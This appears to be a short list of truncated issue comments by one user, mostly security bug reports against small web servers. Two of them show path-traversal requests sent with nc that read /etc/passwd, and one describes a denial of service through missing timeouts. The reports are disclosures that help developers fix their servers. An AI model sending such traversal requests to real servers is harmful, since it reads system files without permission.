Noah Goldsmid
Noah Goldsmid
It is possible to read every file on the system using ../ try: [cotix@lithium ~]$ nc localhost 8080 GET /../../../../../../../etc/passwd HTTP/1.0 HTTP/1.0 200 OK Content-Type: text/plain root: x:0:0:root:/root:/bin/bash ... rest...
I love ncurses, but we cant just dump all comments in one big pile. We need some kind of formatting
Using an include results in fetching every object individually, even when this is not necessary. This commit evaluates the given query and uses the resulting objects instead. If your data...
It is possible to request parent directories. cotix@lithium:~$ nc localhost 9999 GET /../../../../../etc/passwd HTTP/1.0 HTTP/1.1 200 OK Accept-Ranges: bytes Cache-Control: no-cache Content-length: 2333 Content-type: text/plain root:x:0:0:root:/root:/bin/bash ... my whole /etc/passwd...
There seems to be no timeout on the connections. Since every connection takes up a whole thread, this is a very simple DoS vurnability. To make matters worse, because the...